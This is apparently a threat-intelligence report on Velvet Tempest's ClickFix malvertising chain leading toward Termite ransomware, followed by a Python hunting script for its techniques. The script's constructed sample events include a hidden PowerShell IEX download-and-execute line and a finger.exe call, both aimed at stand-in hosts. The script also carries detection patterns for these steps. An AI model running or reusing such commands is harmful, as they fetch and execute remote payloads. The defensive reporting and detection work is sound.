Velvet Tempest is using ClickFix social engineering to stage Termite ransomware intrusions. Cyber-deception firm MalBeacon observed the full attack chain over 12 days in an emulated U.S. non-profit environment with 3,000 endpoints and 2,500 users, publishing its findings on February 26, 2026. No encryption occurred during the observed window, but the operator's behavior matched textbook pre-ransomware activity. BleepingComputer confirmed the attribution on March 7.
MalBeacon calls this the first public reporting linking ClickFix malvertising to Velvet Tempest. The group is also tracked by Microsoft as DEV-0504. The intrusion began on February 3, 2026, when a malvertising lure directed the victim to a fake CAPTCHA page at h3securecloud[.]com. The page instructed the victim to paste an obfuscated command into the Windows Run dialog. That single paste spawned nested cmd.exe chains and used finger.exe, a legitimate but rarely used Windows utility (TCP/79), to pull initial loaders.
Seven minutes was all it took. The attacker retrieved second-stage payloads via curl.exe, extracted a disguised archive via tar.exe, and ran PowerShell IEX (Invoke-Expression, which executes downloaded script text directly in memory without writing it to disk) to fetch DonutLoader from vrstudio[.]life and gamestudio[.]life. On-host .NET compilation via csc.exe from temp directories followed. CastleRAT, a remote access trojan linked to the CastleLoader malware loader, was deployed under C:\ProgramData\AndronFolder\ and used Steam Community profile pages as a dead-drop command-and-control (C2) mechanism.
Hands-on-keyboard activity started the same day. The operator ran Active Directory enumeration through encoded PowerShell, including domain trust discovery, user listing, and drive mapping. Three days later, on February 6, the attacker attempted Chrome credential extraction using a script hosted at 143.198.160[.]37. MalBeacon's sensitive source intelligence links that IP to tool staging for Termite ransomware intrusions. The operator then deleted CastleRAT components in a cleanup step. Long-lived DonutLoader C2 traffic persisted until February 16, spanning 12 days, 20 hours, and 15 minutes in total.
To our knowledge, this is the first public reporting that ties these specific ClickFix-style malvertising chains to Velvet Tempest.
— MalBeacon's operation report, February 26, 2026
Several campaign indicators were fresh: MalBeacon noted they had little or no prior presence in public datasets such as VirusTotal, suggesting purpose-built tooling rather than recycled infrastructure.
Velvet Tempest has operated as a ransomware affiliate for at least five years. Microsoft's Security Blog documented the group deploying at least six ransomware-as-a-service (RaaS) payloads between 2020 and 2022 alone. S-RM tracked the group moving to RansomHub in mid-2024 after BlackCat/ALPHV's operators ran an exit scam on their own affiliates. At RansomHub, Velvet Tempest joined other former BlackCat members including Scattered Spider and the perpetrator of the Change Healthcare breach.
| Ransomware strain | Years active (Velvet Tempest) |
|---|---|
| Ryuk | 2018–2020 |
| REvil | 2019–2022 |
| Conti | 2019–2022 |
| BlackMatter | 2021 |
| BlackCat / ALPHV | 2021–2024 |
| LockBit | 2023–2024 |
| RansomHub | 2024 |
| Termite | 2025–present |
Termite ransomware emerged in mid-2024. It is widely assessed as a modified variant of Babuk, whose source code was leaked in 2021. According to TRM Labs, Termite operates as a closed group rather than an open RaaS model. Its highest-profile attack hit supply chain SaaS provider Blue Yonder on November 21, 2024, exfiltrating 680 GB of data and disrupting operations at Starbucks, Morrisons, and Sainsbury's. The group later breached Australian IVF provider Genea, claiming 940 GB of sensitive patient data.
In the case Kroll observed, the user was infected with the information-stealing malware Red Line Stealer to collect credentials. Ransomware was deployed inside a VMware ESXi environment.
— Laurie Iacono, Associate Managing Director of Cyber Risk at Kroll
Iacono's description of a separate Termite intrusion shows the group's flexibility. In that case, an infostealer preceded the ransomware payload rather than ClickFix. But the pattern is consistent. Credential theft first, encryption second.
Other ransomware affiliates have adopted ClickFix too. Sekoia reported in April 2025 that the Interlock ransomware gang used the same social engineering method to breach corporate networks. ESET's H1 2025 threat report recorded a 517% surge in ClickFix attacks across all threat categories. The technique appeals to ransomware operators because the victim voluntarily executes the command, bypassing file-based endpoint protections entirely.
Neither Microsoft nor any CERT has commented publicly on this specific campaign as of March 9, 2026. MalBeacon has published a full indicator of compromise list with 18 domains, 10 IP addresses, 34 file hashes, and command-line artifacts at its Deception.Pro blog.
Defenders running Windows Active Directory environments should hunt for cmd.exe or PowerShell launched from Windows Run with chained %COMSPEC% commands. Outbound TCP/79 from finger.exe deserves an alert. PowerShell IEX patterns with -WindowStyle Hidden and -EncodedCommand flags, and .NET compilation via csc.exe from user temp directories, are strong indicators of staged loader delivery.
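The hunting guidance above, turned into runnable detection logic as an added example (this is not MalBeacon's or BleepingComputer's code, and it is not the published IoC list). It assumes a flattened, Sysmon-style process-creation record in which the first outbound destination port has already been joined from the matching network-connection event; the `ProcEvent` class, the rule names and every sample event below are constructed for this example, and the hostnames use the reserved `.invalid` TLD rather than any indicator from the campaign. It goes one step beyond the text by decoding the `-EncodedCommand` payload (base64 of UTF-16LE) before looking for IEX, since the Invoke-Expression call is usually hidden inside the encoded blob rather than visible on the raw command line.

```python
# Added example: detection logic for the four hunting patterns described above.
# Not MalBeacon's code; event format, rule names and sample events are constructed.
import base64
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    pid: int
    image: str                       # executable name, e.g. "cmd.exe"
    parent: str                      # parent image name
    cmdline: str                     # full command line as logged
    cwd: str = ""                    # working directory at process start
    dest_port: Optional[int] = None  # first outbound TCP port (constructed join)


# PowerShell accepts -e/-ec/-enc/-EncodedCommand and -w/-WindowStyle as prefixes.
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.I)
_IEX_RE = re.compile(r"\biex\b|invoke-expression", re.I)
_TEMP_RE = re.compile(r"\\temp\\|%temp%|\\appdata\\local\\temp", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script (UTF-16LE), or '' if absent or malformed."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def run_dialog_comspec(e: ProcEvent) -> bool:
    """Shell launched from the Run dialog (parent explorer.exe) that chains %COMSPEC%."""
    return (e.parent.lower() == "explorer.exe"
            and e.image.lower() in ("cmd.exe", "powershell.exe")
            and "%comspec%" in e.cmdline.lower())


def finger_outbound(e: ProcEvent) -> bool:
    """finger.exe with an outbound TCP/79 connection."""
    return e.image.lower() == "finger.exe" and e.dest_port == 79


def hidden_iex(e: ProcEvent) -> bool:
    """Hidden-window PowerShell whose plain or decoded command line calls IEX."""
    if e.image.lower() not in ("powershell.exe", "pwsh.exe"):
        return False
    if not _HIDDEN_RE.search(e.cmdline):
        return False
    script = e.cmdline + " " + decode_encoded_command(e.cmdline)
    return bool(_IEX_RE.search(script))


def csc_from_temp(e: ProcEvent) -> bool:
    """On-host .NET compilation (csc.exe) started from, or reading, a user temp directory."""
    return e.image.lower() == "csc.exe" and bool(_TEMP_RE.search(e.cwd + " " + e.cmdline))


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "run_dialog_comspec": run_dialog_comspec,
    "finger_tcp79": finger_outbound,
    "hidden_powershell_iex": hidden_iex,
    "csc_from_temp": csc_from_temp,
}


def hunt(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule name) for every event that matches a rule."""
    return [(e.pid, name) for e in events for name, rule in RULES.items() if rule(e)]


def _encode(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (constructed input)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry: four events mirroring the described chain, three benign.
SAMPLE_EVENTS = [
    ProcEvent(101, "cmd.exe", "explorer.exe", 'cmd.exe /c "%COMSPEC% /c %COMSPEC% /c echo stage"'),
    ProcEvent(102, "finger.exe", "cmd.exe", "finger.exe user@c2.invalid", dest_port=79),
    ProcEvent(103, "powershell.exe", "cmd.exe",
              "powershell.exe -WindowStyle Hidden -EncodedCommand "
              + _encode("IEX (New-Object Net.WebClient).DownloadString('http://loader.invalid/s')")),
    ProcEvent(104, "csc.exe", "powershell.exe",
              r'csc.exe /noconfig @"C:\Users\u\AppData\Local\Temp\abc.cmdline"',
              cwd=r"C:\Users\u\AppData\Local\Temp"),
    ProcEvent(201, "powershell.exe", "explorer.exe",
              "powershell.exe -NoProfile -EncodedCommand " + _encode("Get-Date")),
    ProcEvent(202, "csc.exe", "msbuild.exe", "csc.exe /out:app.dll Program.cs", cwd=r"C:\Projects\app"),
    ProcEvent(203, "cmd.exe", "explorer.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for pid, rule in hunt(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The benign events matter as much as the hits: a developer's csc.exe run from a project directory and an encoded but unhidden `Get-Date` should stay quiet, otherwise the rules generate noise and get tuned out. In production the same checks map naturally onto Sysmon Event ID 1 (process creation) joined to Event ID 3 (network connection) by process GUID.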